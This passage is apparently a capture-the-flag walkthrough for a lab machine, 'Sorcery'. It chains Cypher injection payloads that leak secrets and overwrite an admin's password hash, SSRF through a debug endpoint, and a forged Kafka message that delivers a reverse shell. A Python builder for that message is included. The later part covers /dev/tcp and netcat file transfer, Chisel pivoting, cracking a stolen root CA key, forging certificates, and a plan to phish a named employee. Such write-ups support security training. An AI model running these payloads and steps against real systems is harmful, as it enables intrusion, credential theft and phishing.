}Only logged-in users with privilege level ≥ 2 (admin) can access, and they must also have WebAuthn registered and verified — so this is likely admin or high-trust area.
The debug dashboard render under frontend/src/app/dashboard/debug/page-client.tsx. From line 25, we know that we can send arbitrary data to any host:port:
host: z.string().min(1),
port: z.coerce.number().min(0).max(65535),
data: [{ value: string }]This means we can connect to internal services and perform protocol-aware fuzzing like:
JSON{ "host": "127.0.0.1", "port": 8000, "data": ["GET / HTTP/1.1\r\nHost: localhost\r\n\r\n"] }
Backend
The backend/src/api/debug/debug.rs confirms everything we suspected — and more.
If we are able to access the debug page, We have a full TCP SSRF primitives + XSS sink. The raw TCP socket to any host:port combo — user-controlled:
TcpStream::connect(format!("{}:{}", data.host, data.port))We can send arbitrary binary data:
hex::decode(request)The server optionally reads all response bytes (e.g., HTML, SSH banners, internal APIs):
stream.read_to_end(&mut result)Returns the data as hex (Frontend must decode):
hex::encode(&result)We can internal IPs and services, or forge fake DNS updates by targeting the dns service in the same docker-compose.
Cypher Injection
Injection Point
User registration works even without a Registration Key, landing us a low-privileged Client account.
As always, packet inspection is the opening move. Logging in with username and password triggers a second POST request — which drops a JWT token into our lap:

Decode the JWT for inspection:

Once authenticated, we breach the dashboard — sandboxed to client-only features. We poke at the Passkey functionality:

But the silence from the network tells the story: no request, no access.
Heads up! Some features are only available for sellers or admins.
We're restricted to viewing stores by id (look at the unusual (id) HTML layout). But here's the twist — the request handler is vulnerable to Cypher Injection (Ref-Hook-1).

A clean request to GET /dashboard/store/<id> yields a Graph map payload:

The Next.js frontend dispatches this through /api/product/<id>, hardcoded in frontend/src/app/dashboard/store/[product]/page.tsx at line 13:
const response = await API().get(`product/${params.product}`);If we reload the page directly, the network trace captures the actual HTML response, instead of the async JSON returned by JavaScript fetches:

Structure Query
We toss the request into Burp Repeater and inject a lone double quote ("), as introduced in the Cypher writeup — the response coughs up a 500 Internal Server Error:

Injection point validated.
The backend dynamically composes Cypher queries like:
MATCH (result: Product { id: "some-id" }) RETURN resultConfirmed in the source (Ref-Hook-2):
let query_string = format!(
r#"MATCH (result: {} {{ {}: "{}" }}) RETURN result"#,
#struct_name, #name_string, #name
);For instance, when invoking:
Product::get_by_id(id.to_owned()).awaitIt translates to:
MATCH (result: Product { id: "user_input" }) RETURN resultOur payload needs to break out of:
{ id: "user_input" }We aim to surgically break out of the quoted string and append our own query logic. A payload like:
" }) RETURN result//would reconstruct and terminate the original query cleanly, yielding:
MATCH (result: Product { id: "<id>" }) RETURN result// " }) RETURN resultOf course this must be URL-encoded to slip past GET request filters:

However, there's a snag — the backend rejects unknown IDs with a 404. A malformed or non-existent ID kills the injection early, regardless of syntax.
To bypass that, we craft a syntactically valid query that retains the original match and piggybacks an additional clause, which should be akin to:
MATCH (result: ...) ... RETURN resultPer the Neo4j manual, OPTIONAL MATCH is our ticket in:
"}) OPTIONAL MATCH (u:User) RETURN result { .*, description: u.username }//This would leave a valid query while not touching the 404 error handler as:
MATCH (result: Product { id: "8f056c44-df4a-4b15-b2c5-466536bed3cd" })
OPTIONAL MATCH (u:User)
RETURN result { .*, description: u.username }
// " }) RETURN resultAnd it works:

The server leaks the username from the first User node — admin.
Useris a globally defined structure (Ref-Hook-3), not directly printable. But we can leverage Cypher's property projection to exfiltrate nested data:CypherRETURN result { .* }grabs all fields from
result, andCypheru.usernameextracts a specific attribute from the injected
Usernode.The value is dumped into the
descriptionfield of theProductstruct, perbackend/src/db/models/product.rs:Rust#[derive(Model, Serialize, Deserialize)] pub struct Product { pub id: String, pub name: String, pub description: String, pub is_authorized: bool, pub created_by_id: String, }Well we could also leak into
nameorid— same trick, different field.
Leak Registraion Key
Our current bottleneck: we can't activate the Passkey flow without escalating to a Seller or admin.
From the code (Ref-Hook-4), registration_key is parsed as an optional during signup. If provided and valid (Ref-Hook-5), it unlocks elevated privileges.
We track its origin via a quick grep:
$ grep -rn 'registration_key' infrastructure
infrastructure/backend/src/db/connection.rs:27: configs.remove(0).registration_key
infrastructure/backend/src/db/connection.rs:34: registration_key: String,
infrastructure/backend/src/db/connection.rs:44: registration_key: Uuid::new_v4().to_string(),
infrastructure/backend/src/api/auth/register.rs:17: registration_key: Option<String>,
infrastructure/backend/src/api/auth/register.rs:30: registration_key,
infrastructure/backend/src/api/auth/register.rs:41: privilege_level: if registration_key.is_some()
infrastructure/backend/src/api/auth/register.rs:42: && ®istration_key.unwrap() == REGISTRATION_KEY.get().awaitThe key entry lies in backend/src/db/connection.rs at line 34:
#[derive(Deserialize, Model)]
struct Config {
is_initialized: bool,
registration_key: String,
}Translation: it's tucked inside a global Config node.
Therefore, with the same technique we leak the admin username, we can leak this attribute for the first user (probably admin as well):
"}) OPTIONAL MATCH (c:Config) RETURN result { .*, description: c.registration_key }//Hit confirmed:

Leaked registration_key from the admin user:
dd05d743-b560-45dc-9a09-43ab18c7a513We use it to create a Seller account:

Now elevated, new options unlock — like uploading a product.
Still, this isn't the admin yet. But we're not done.
The intended path from here should be exploiting XSS to escalate for
amdminuser.
Argon Hash
Let's leak the hashed password of admin:
"}) OPTIONAL MATCH (u:User) RETURN result { .*, description: u.password }//And there it is:

Confirmed in code (Ref-Hook-6) — hashed via Argon2.
$argon2id$v=19$m=19456,t=2,p=1$T+K9waOashQqEOcDljfe5Q$X5Yul0HakDZrbkEDxnfn2KYJv/BdaFsXn7xNwS1ab8EInstead of brute-forcing it, we overwrite it.
Before that, we need to clear out the format of an Argon2 hash:
$argon2id$v=VERSION$m=MEMORY,t=ITERATIONS,p=PARALLELISM$BASE64_SALT$BASE64_HASHSo in our case:
| Component | Value |
|---|---|
| Algorithm | Argon2id |
| Version | 19 (0x13) |
| Memory | 19,456 KB (~19 MB) |
| Iterations | 2 |
| Parallelism | 1 thread |
| Salt | Random, 16 bytes |
| Hash | Output of KDF, 32 bytes |
Generate a same-style hash via https://argon2.online/, against a simple password for example 123456, with the same 19456 KB, 2 iterations, 1 thread, 32-byte hash, and a random salt:
$argon2i$v=19$m=19456,t=2,p=1$WmFnWGxlYkJ5cEVIT21USA$FJbW2hb66gDJzSEiqLR9iJXj4AxdShErsvhL+/zjJ5sPayload to overwrite admin's password:
"}) MATCH (u:User {username: "admin"}) SET u.password= "$argon2i$v=19$m=19456,t=2,p=1$WmFnWGxlYkJ5cEVIT21USA$FJbW2hb66gDJzSEiqLR9iJXj4AxdShErsvhL+/zjJ5s" RETURN result { .*, description: "Admin password hijacked" } AS result //Boom:

We wait for it to sync. Then log in as admin with password 123456:

And we have full access to all the features on the web application.
Passkeys & WebAuthn
Next phase: we weaponize the Passkey feature to breach the Debug endpoint (Ref-Hook-7).

As outlined in this guide, Passkeys are phishing-resistant credentials, built on public key cryptography, not secrets. They're part of the FIDO2 spec stack, with WebAuthn being the web-facing standard.
In this Rust-based app, WebAuthn support implies:
- FIDO2-compatible login
- Backed by asymmetric keypairs
- Using Authenticators (external, internal, or virtual — which is our vector)
Passkeys are the credentials. WebAuthn is the protocol that makes them work in-browser.
Chrome Devtools
Since WebAuthn is active (Ref-Hook-7), we simulate a Passkey device using DevTools, according to the Official Chrome Developer documentation.
First, we press F12 to open DevTools in chrome, and click the three-dot menu in top right corner of DevTools for: More tools → WebAuthn:

Then check Enable virtual authenticator environment to enable Virtual Authenticator, and click "Add" for:
- Protocol:
CTAP2(modern and secure) - Transport:
USB(you can also tryinternalornfcif needed) - Support resident keys: Yes (important for passkey-style login)
- User verification: Yes (simulate FaceID/Fingerprint)

Now the browser pretends it's holding a real hardware token.
We enroll at /api/webauthn/passkey/register/start (Ref-Hook-8) — and this time, the system hands back a valid Passkey ID:

We log out, then back in — now with the freshly bound Passkey:

With Debug now unlocked, we gain visibility — and potentially interaction — with all internal services enumerated in docker-compose.yml (Ref-Hook-9).
Kafka RCE
Finally, we're in position to exploit SSRF via the unlocked debug endpoint.
Mechanism
From docker-compose.yml, we observe the architecture involves a Kafka message broker linked to a dns worker:
kafka:
restart: always
build: kafka
environment:
CLUSTER_ID: pXWI6g0JROm4f-1iZ_YH0Q
KAFKA_NODE_ID: 1
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
KAFKA_LISTENERS: PLAINTEXT://kafka:9092,CONTROLLER://kafka:9093
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092
KAFKA_PROCESS_ROLES: broker,controller
KAFKA_CONTROLLER_QUORUM_VOTERS: 1@kafka:9093
KAFKA_CONTROLLER_LISTENER_NAMES: CONTROLLER
healthcheck:
test: ["CMD", "bash", "-c", "cat < /dev/null > /dev/tcp/kafka/9092"]
interval: 5s
timeout: 10s
retries: 5
dns:
restart: always
build: dns
environment:
WAIT_HOSTS: kafka:9092
KAFKA_BROKER: ${KAFKA_BROKER}This already suggests the dns service is Kafka-bound, awaiting instructions from the broker.
The exploit path becomes clear after auditing the Dns feature (Ref-Hook-10).
In backend/src/api/dns/update.rs, any request to POST /api/dns triggers the backend to publish a Kafka message to topic update:
topic: "update",
value: "/dns/convert.sh".as_bytes()The Kafka payload value is just a string — a filepath or command — which the dns worker consumes.
The RCE sink resides in dns/main.rs (Ref-Hook-11):
let Ok(command) = str::from_utf8(message.value) else {
continue;
};
Command::new("bash").arg("-c").arg(command).spawn()This means:
- If the Kafka message isn't valid JSON (i.e., not a serialized DNS config), it still gets parsed as a string.
- That string is executed directly via
bash -c.
⚠️ No validation, no filtering, no sandbox.
Before the command is run, the program attempts to deserialize the payload as Vec<DnsEntry> (Ref-Hook-12):
let Ok(entries) = serde_json::from_slice::<Vec<DnsEntry>>(message.value) else {
continue;
};But if that fails — the fallback hits. The message gets reinterpreted as a shell command.
This gives us two execution paths:
- Valid JSON array → update DNS entries
- Invalid JSON / raw string → pass directly to
bash -c→ RCE
So the exploit boils down to sending a Kafka message to topic update like:
topic: "update"
value: b"bash -c '<arbitrary_command>'"If we can route that message internally — via SSRF through the debug endpoint — the dns service will run it blindly.
💡 This delivers full command execution inside the DNS container.
As a side note, we can observe:

The DNS records shown in the frontend (via /api/webauthn/passkey/get) come from Kafka too — read from topic get, and returned as JSON like:
{"entries":[{"name":"git.sorcery.htb","value":"127.0.0.1"}, ...]}Overall,
- The Kafka broker is the message control plane.
- The
dnsservice acts onupdatemessages either as config JSON or shell commands. - We can hijack that flow to achieve unfiltered RCE in the DNS container.
This is a textbook message queue injection → shell execution escalation path:
+---------------------+ Kafka Broker +---------------------+
| Attacker Control |--------------------------------->| Topic: "update" |
| (via SSRF or API) | (Send: "bash -c ...") | Receives message |
+---------------------+ +---------------------+
|
v
+-----------------------------+
| DNS Service |
| (main.rs, loop on messages) |
+-----------------------------+
|
| if valid JSON:
| parse as Vec<DnsEntry>
| else:
| treat as raw string
v
+------------------------------+
| bash -c "COMMAND_HERE" |
| (Direct shell execution) |
+------------------------------+
|
v
+----------------------------+
| /dns/entries updated |
| or arbitrary command run |
+----------------------------+
|
v
+---------------------------+
| Kafka Topic: "get" |
| (Contains DNS entries) |
+---------------------------+
|
v
+-------------------------------------+
| Web App API (e.g. GET /api/dns) |
| Reads from "get" topic and returns |
+-------------------------------------+What's left is crafting the exact Kafka protocol payload we'll need to inject through SSRF.
Exploit
We've confirmed: any Kafka message pushed to topic update with raw text like bash -c 'curl http://x' gets executed on the DNS container.
So the plan is simple:
- Forge a Kafka
ProduceRequest - Send it to
kafka:9092via SSRF through the debug endpoint - Payload:
bash -c 'bash -i >& /dev/tcp/10.10.13.2/4444 0>&1'
1. Capture Raw TCP Kafka Request
Run tcpdump on our host to intercept the raw TCP stream:
sudo tcpdump -i br-854d707442d8 port 9092 -w kafka-msg.pcapEnsure we're listening on the correct Docker bridge.
1. Locally Run Kafka + kafkacat
Launch Kafka locally with kaf.sh:
#!/bin/bash
# Step 1: Create network if not exists
sudo docker network inspect kafka-net >/dev/null 2>&1 || docker network create kafka-net
# Step 2: Start Kafka container (with internal Zookeeper)
sudo docker run -d --rm --name zookeeper \
--network kafka-net \
-e ZOOKEEPER_CLIENT_PORT=2181 \
confluentinc/cp-zookeeper:7.5.0
sleep 5
sudo docker run -d --rm --name kafka \
--network kafka-net \
-e KAFKA_BROKER_ID=1 \
-e KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181 \
-e KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 \
-e KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://kafka:9092 \
-e KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR=1 \
confluentinc/cp-kafka:7.5.0
echo "[*] Waiting for Kafka to become ready..."
sleep 10
# Step 3: Publish a message to the 'update' topic
# [!] Replace this with actual payload, e.g., RCE string
PAYLOAD="bash -c \"/bin/sh -i >& /dev/tcp/10.10.13.3/4444 0>&1\""
echo "[*] Sending payload: $PAYLOAD"
echo "$PAYLOAD" | sudo docker run -i --rm --name kafkacat \
--network kafka-net \
edenhill/kafkacat:1.6.0 \
-b kafka:9092 -t update -P
echo "[+] Done."Once the message is sent, stop tcpdump. And we will capture the traffic packages:

3. Extract the Raw TCP Payload
Open kafka-msg.pcap in Wireshark.
- Right-click on a TCP segment → Follow TCP Stream
- Select direction: Client → Server (red), for we want only the Kafka
ProduceRequestmessage. - Format: Raw
- Save to
payload.bin

The saved stream payload.bin may look like:
$rdkafka
librdkafka1.5.0rdkafkaupdaterdkafkaupdaterdkafkaupdateymGiwTwTvjbash -c '/bin/sh -i >& /dev/tcp/10.10.13.3/4444 0>&1'Convert it to hex string (for SSRF at Debug endpoint):
xxd -p payload.bin | tr -d '\n'Which gives a hex-encoded Kafka ProduceRequest like:
000000240012000300000001000772646b61666b61000b6c696272646b61666b6106312e352e30000000001e0003000400000002000772646b61666b61000000010006757064617465010000001e0003000400000003000772646b61666b6100000001000675706461746501000000aa0000000700000004000772646b61666b61ffffffff0000138800000001000675706461746500000001000000000000007900000000000000000000006d000000000247b66996000000000000000001977754e788000001977754e788ffffffffffffffffffffffffffff0000000176000000016a62617368202d6320272f62696e2f7368202d69203e2620xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1362e382f3434343420303e26312700We've successfully extracted a valid Kafka ProduceRequest (for topic update) that injects a reverse shell.
Or we can refer to this post and generate the request matching the Kafka protocol as follow:
Pythonimport struct import binascii class KafkaProduceRequest: def __init__(self, topic, message, client_id="", partition=0, correlation_id=1): self.topic = topic self.message = message.encode() self.client_id = client_id self.partition = partition self.correlation_id = correlation_id def _build_header(self): api_key = 0 # Produce api_version = 0 header = struct.pack(">hhI", api_key, api_version, self.correlation_id) header += struct.pack(">h", len(self.client_id)) + self.client_id.encode() header += struct.pack(">hI", -1, 30000) # acks = -1, timeout = 30000ms return header def _build_topic_block(self): topic_block = struct.pack(">i", 1) # One topic topic_block += struct.pack(">h", len(self.topic)) + self.topic.encode() topic_block += struct.pack(">i", 1) # One partition topic_block += struct.pack(">i", self.partition) topic_block += self._build_message_set() return topic_block def _build_message_set(self): null_key = struct.pack(">i", -1) value = struct.pack(">i", len(self.message)) + self.message magic = struct.pack("BB", 0, 0) message = magic + null_key + value crc = binascii.crc32(message) & 0xffffffff kafka_message = struct.pack(">I", crc) + message message_set = struct.pack(">qI", 0, len(kafka_message)) + kafka_message return struct.pack(">i", len(message_set)) + message_set def build(self): full_body = self._build_header() + self._build_topic_block() return struct.pack(">i", len(full_body)) + full_body def to_hex(self): return binascii.hexlify(self.build()).decode() if __name__ == "__main__": """ Construct reverse shell payload """ ip = "10.10.13.3" port = 4444 shell_command = f"bash -c '/bin/sh -i >& /dev/tcp/{ip}/{port} 0>&1'" req = KafkaProduceRequest(topic="update", message=shell_command) print("Hex-encoded Kafka ProduceRequest:\n") print(req.to_hex())
4. Use SSRF to Replay RCE
Now we launch the final payload using the SSRF-capable /debug endpoint, targeting the internal Kafka broker.
We direct the request to kafka:9092 (known by docker-compose.yml):

The Kafka broker receives our forged ProduceRequest, and the dns container consumes it — blindly executing the payload via bash -c.
As expected, we catch a reverse shell as the unprivileged user inside the isolated Docker container:

USER
Blog
In the Blog section of the web application, we see two posts:
Phishing Training Hello, just making a quick summary of the phishing training we had last week. Remember not to open any link in the email unless: a) the link comes from one of our domains (
<something>.sorcery.htb); b) the website uses HTTPS; c) the subdomain uses our root CA. (the private key is safely stored on our FTP server, so it can't be hacked).Phishing awareness There has been a phishing campaign that used our Gitea instance. All of our employees except one (looking at you, @tom_summers) have passed the test. Unfortunately, Tom has entered their credentials, but our infosec team quickly revoked the access and changed the password. Tom, make sure that doesn't happen again! Follow the rules in the other post!
This shows the way to our phishing exploit:
- Tom was the only one who fell for the phishing campaign
- “All of our employees except one (looking at you, @tom_summers) have passed the test.”
- He entered credentials into a fake Gitea instance
- “Tom has entered their credentials, but our infosec team quickly revoked the access.”
- They have strict phishing awareness criteria:
- Only accept links from
*.sorcery.htb - HTTPS only
- Must use their root CA
- Only accept links from
This implies that the bad boy tom_summers could be the target. Our phishing plan is:
- Set up a fake Gitea site on something like
evil.sorcery.htb- Use HTTPS
- Sign a TLS cert with the RootCA.key + RootCA.crt obtained from FTP
- Poison DNS
- Map
gitea.sorcery.htborevil.sorcery.htbto our phish server
- Map
- Send the phishing link via the internal mail bot
- To
[email protected] - Include a "Gitea login expired" or "Security update" lure
- To
- Capture credentials
- Use a simple HTML login clone or
mitmproxywith credential injection capture
- Use a simple HTML login clone or
Let's go.
File Transfer Trick
Inside the container, we spot an executable named dns:
user@7bfb70ee5b9c:/app$ ls -l dns
-rwxr-xr-x 1 root root 1167088 Oct 30 2024 dns
user@7bfb70ee5b9c:/app$ cat dns
ELF>@p@8@"!@@PPPPPe+
e+
A binary blob — standard Linux ELF.
Since outbound tools like curl or wget are absent, we fall back to the classic TCP file transfer with netcat.
First, grab a static busybox binary:
wget https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64Then serve it from the attacker machine:
nc -lvnp 12345 < busyboxOn the reverse shell, execute:
bash -c 'cat < /dev/tcp/10.10.13.3/12345 > /tmp/busybox' &
chmod +x /tmp/busyboxNow we have nc and other core tools in one.
Use the same trick, but in reverse, to transport the dns file on our attack machine:
# On our attacker machine (listener)
nc -lvnp 9001 > dns_dumped
# On the victim machine (reverse shell):
/tmp/busybox nc 10.10.13.3 9001 < /app/dns &After downloading, we see the binary is not stripped:
$ file dns_dumped
dns_dumped: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=696b266b795f17414a0afb318c1bd923a7c52bdf, for GNU/Linux 3.2.0, not strippedEasy for reversing, it turns out it's just the compiled Infrastructure project. But we may dive deeper into it for hard coded secrets in this runtime binary.
Additionally, there's a wait binary under /:
user@7bfb70ee5b9c:/app$ ls -l /
...
-rwxr-xr-x 1 root root 506040 Sep 27 2023 waitStripped. No symbols. No help strings.
Its name implies a service listener or Kafka trigger — possibly phishing-related, or hooked into the bot behavior.
Service Scan
Now we can also use wget from busy box to upload a static nmap to perform an IP scan:
Nmap scan report for 172.19.0.1
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
Nmap scan report for services-gitea-1.services_default (172.19.0.2)
Host is up (0.00042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open unknown
Nmap scan report for 7bfb70ee5b9c (172.19.0.3)
Host is up (0.0017s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
53/tcp open domain
Nmap scan report for services-ftp-1.services_default (172.19.0.4)
Host is up (0.049s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
21/tcp open ftp
Nmap scan report for services-mail_bot-1.services_default (172.19.0.5)
Host is up (0.0010s latency).
All 65535 scanned ports on services-mail_bot-1.services_default (172.19.0.5) are closed
Nmap scan report for services-backend-1.services_default (172.19.0.6)
Host is up (0.00079s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
8000/tcp open unknown
Nmap scan report for services-frontend-1.services_default (172.19.0.7)
Host is up (0.00078s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
3000/tcp open unknown
Nmap scan report for services-nginx-1.services_default (172.19.0.8)
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
443/tcp open https
Nmap scan report for services-kafka-1.services_default (172.19.0.9)
Host is up (0.0013s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
8082/tcp open unknown
9092/tcp open unknown
9093/tcp open unknown
33869/tcp open unknown
40195/tcp open unknown
Nmap scan report for services-mail-1.services_default (172.19.0.10)
Host is up (0.00092s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
1025/tcp open unknown
8025/tcp open unknown
Nmap scan report for services-neo4j-1.services_default (172.19.0.11)
Host is up (0.00083s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
7474/tcp open unknown
7687/tcp open unknown
Nmap done: 256 IP addresses (11 hosts up) scanned in 1452.93 secondsThis matches our early findings from the Docker files, and changes dynamically each time we restart the machine — but with the service name known, we can use getent host <service_name> to get its corresponding IP at runtime.
Gitea
Chisel
To get persistent and flexible access to internal services, we pivot with Chisel, a reverse proxy tunnel.
Fire up the Chisel server on the attacker machine:
./chisel server -p 8088 --reverseTransfer the chisel binary to the victim (via busybox nc or busybox wget), and launch:
/tmp/chisel client 10.10.13.3:8088 R:socks &This exposes a SOCKS5 proxy on 127.0.0.1:1080, allowing full pivoting.
With that, internal services like http://172.19.0.2:3000 become accessible in-browser:

Git or Gitea
Let's step back — why was git.sorcery.htb embedded in the original DNS entries?
Looking at 172.19.0.2, which exposes:
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open unknownPort 3000 serves Gitea, likely the dev team's internal hub.
It makes sense: the infrastructure distinguishes between public git.sorcery.htb and the internal dev instance, possibly at gitea.sorcery.htb, to avoid DNS collisions.
Same Gitea, different purpose — this one's probably where nicole_sullivan, tom_summers and others work on the actual codebase:

Also note: SSH (port 22) is exposed.
If we succeed in phishing or recovering internal credentials, this could offer a clean path to lateral movement or privilege escalation.

The stage is set — phishing the right dev, and we breach another layer of the maze.
Ftp
From the previously leaked docker-compose.yml, we identify an internal anonymous FTP server:
ftp:
restart: always
image: million12/vsftpd:cd94636
environment:
ANONYMOUS_ACCESS: true
LOG_STDOUT: true
volumes:
- "./ftp/pub:/var/ftp/pub"
- "./certificates/generated/RootCA.crt:/var/ftp/pub/RootCA.crt"
- "./certificates/generated/RootCA.key:/var/ftp/pub/RootCA.key"
healthcheck:
test: ["CMD", "bash", "-c", "cat < /dev/null > /dev/tcp/127.0.0.1/21"]
interval: 5s
timeout: 10s
retries: 5This reveals a few critical things:
- FTP is wide open to anonymous access
- It's hosting a folder
/var/ftp/pub/ - Inside are two highly sensitive files:
RootCA.crtRootCA.key
These are the Certificate Authority credentials — foundational trust material. We've seen this kind of vulnerability chain before (e.g., in the University machine).
The target service is likely services-ftp-1 at 172.19.0.10.
We can run Python to visit it from the container:
user@7bfb70ee5b9c$ python3 -c "from ftplib import FTP; ftp=FTP('172.19.0.4'); ftp.login(); ftp.retrlines('LIST')"
drwxrwxrwx 2 ftp ftp 4096 Oct 31 2024 pubConfirmed: the pub folder is exposed.
Now dump both RootCA.crt and RootCA.key:
python3 -c "
from ftplib import FTP
ftp = FTP('172.19.0.4')
ftp.login()
with open('RootCA.crt', 'wb') as f:
ftp.retrbinary('RETR pub/RootCA.crt', f.write)
with open('RootCA.key', 'wb') as f:
ftp.retrbinary('RETR pub/RootCA.key', f.write)
"Done:
user@7bfb70ee5b9c:/dns$ ls -l Root*
-rw-r--r-- 1 user user 1826 Jun 16 13:47 RootCA.crt
-rw-r--r-- 1 user user 3434 Jun 16 13:47 RootCA.keyAgiain use nc inside busybox to download them.
Root CAs
Decrypt CA
We inspect the dumped Root CA files:
$ openssl x509 -in RootCA.crt -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
55:98:e2:11:29:e8:a7:e9:cd:bb:da:e4:5a:56:d7:39:18:e5:ad:cd
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=Sorcery Root CA
Validity
Not Before: Oct 31 02:09:08 2024 GMT
Not After : Aug 16 02:09:08 2298 GMT
Subject: CN=Sorcery Root CA
...
$ head RootCA.key
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIJrTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQI4I3iO1Zn5XkCAggA
MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBDcZKASBSs0bWpLaNHAilbOBIIJ
...This is typical for self-signed Root CAs (Issuer == Subject → CN=Sorcery Root CA)
Now that we know it's a valid CA certificate, we should check key and cert match:
openssl rsa -noout -modulus -in RootCA.key | openssl md5
openssl x509 -noout -modulus -in RootCA.crt | openssl md5However:
$ openssl rsa -noout -modulus -in RootCA.key | openssl md5
Enter pass phrase for RootCA.key:
Could not find private key from RootCA.key
802BA8506B740000:error:1608010C:STORE routines:ossl_store_handle_load_result:unsupported:crypto/store/store_result.c:151:
802BA8506B740000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:providers/implementations/ciphers/ciphercommon_block.c:107:
802BA8506B740000:error:11800074:PKCS12 routines:PKCS12_pbe_crypt_ex:pkcs12 cipherfinal error:crypto/pkcs12/p12_decr.c:92:empty password
MD5(stdin)= d41d8cd98f00b204e9800998ecf8427eIt's encrypted, and it fails standard decryption without the passphrase.
We can try to brute-force the passphrase of the RootCA.key with John the Ripper:
pem2john.py RootCA.key > rsa_hash.txt The extracted hash is like:
$PEM$2$pbkdf2$sha256$aes256_cbc$4$e08de23b5667e579$2048$dc64a0120...Run john on the hash:
john rsa_hash.txt --wordlist=~/wordlists/rockyou.txtBut john chokes on prf=sha256:
Warning: PEM prf algorithm <sha256> is not supported currently!
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)To fix this bug, we can refer to this issue.
The core issue is that pem2john.py and John's PEM format code pem_fmt_plug.c is hardcoded to use pbkdf2_sha1, which won't work with prf=sha256.
We can either fix the source by ourselves, or simply crack the hash with hashcat with mode 24420 (PEM: PKCS#8 private key (PBKDF2-HMAC-SHA256 AES)), with an example format refer to Hashcat Wiki:
$PEM$2$4$ed02960b8a10b1f1$2048$a634c482a95f23bd8fada558e1bac2cf$1232$50b21db4aededb96...Therefore, remove this part from the pem2john output:
$pbkdf2$sha256$aes256_cbcThen we are happy to crack it with hashcat:
hashcat -m 24420 -a 0 pem_hash.txt ~/wordlists/rockyou.txt --forceNice password:

Now decrypt it cleanly:
openssl rsa -in RootCA.key -out RootCA-decrypted.keyEnter the passphrase, it creates RootCA-decrypted.key, an unencrypted RSA private key:
$ ll RootCA-decrypted.key
-rw------- 1 Axura Axura 3.2K Jun 16 21:07 RootCA-decrypted.key
$ openssl rsa -in RootCA-decrypted.key -check
RSA key ok
writing RSA key
-----BEGIN PRIVATE KEY-----
MIIJQgIBADANBgkqhkiG9w0BAQEFAASCCSwwggkoAgEAAoICAQCN/ViSM+ZkeuX1
...
NIC+fXzbrAq6zgOBbw9oqSQkjjcxFQ==
-----END PRIVATE KEY-----Sign Certs
We can now sign arbitrary certs — the magic weapon for phishing, impersonation, and MiTM.
Generate a key + CSR:
openssl req -newkey rsa:2048 -nodes \
-keyout giteas.key \
-out giteas.csr \
-subj "/CN=giteas.sorcery.htb"Sign the cert using the CA (RootCA.crt, RootCA.key) with the cracked passphrase password:
openssl x509 -req -in giteas.csr \
-CA RootCA.crt -CAkey RootCA.key \
-CAcreateserial \
-out giteas.crt \
-days 365Verify the certficate against CA:
$ openssl x509 -in giteas.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
79:0a:35:58:b4:49:92:5a:a8:72:fc:65:a5:4c:03:e3:00:ac:80:18
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=Sorcery Root CA
Validity
Not Before: Jun 17 08:26:57 2025 GMT
Not After : Jun 17 08:26:57 2026 GMT
Subject: CN=giteas.sorcery.htb
Subject Public Key Info:
...The cert game just turned in our favor.
Dns
With busybox in play, we can enumerate internal bindings via:
user@7bfb70ee5b9c:/tmp/busybox netstat -lantp
netstat: showing only processes with your user ID
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 10/dnsmasq
tcp 0 0 127.0.0.11:36971 0.0.0.0:* LISTEN -
tcp 1 0 172.19.0.8:39438 172.19.0.6:9092 CLOSE_WAIT 9/dns
tcp 1 0 172.19.0.8:39432 172.19.0.6:9092 CLOSE_WAIT 9/dns
tcp 0 237 172.19.0.8:37612 10.10.13.3:4444 ESTABLISHED 23/sh
tcp 0 0 :::53 :::* LISTEN 10/dnsmasqdnsmasqis listening on port 53 on all interfaces:- The container IP is
172.19.0.8. - It is connecting to
172.19.0.6:9092— this is the Kafka container. 127.0.0.11:36971is Docker's internal DNS forwarder.
Dns Parsing Files
There's a /dns directory under root:
user@7bfb70ee5b9c:/app$ ls -l /
total 572
drwxr-xr-x 1 root root 4096 Apr 28 12:07 app
drwxr-xr-x 1 user user 4096 Apr 28 12:07 dns
-rwxr-xr-x 1 root root 117 Oct 30 2024 docker-entrypoint.sh
-rwxr-xr-x 1 root root 506040 Sep 27 2023 wait
...It's where the web app stores the suspicious convert.sh:
user@7bfb70ee5b9c:/dns$ ls -l
total 8
-rwxr-xr-x 1 root root 364 Aug 31 2024 convert.sh
-rwxr--r-- 1 user user 0 Oct 31 2024 entries
-rw-r--r-- 1 root root 598 Jun 16 04:52 hostsconvert.sh is owned by root and executable. Read it:
#!/bin/bash
entries_file=/dns/entries
hosts_files=("/dns/hosts" "/dns/hosts-user")
> $entries_file
for hosts_file in ${hosts_files[@]}; do
while IFS= read -r line; do
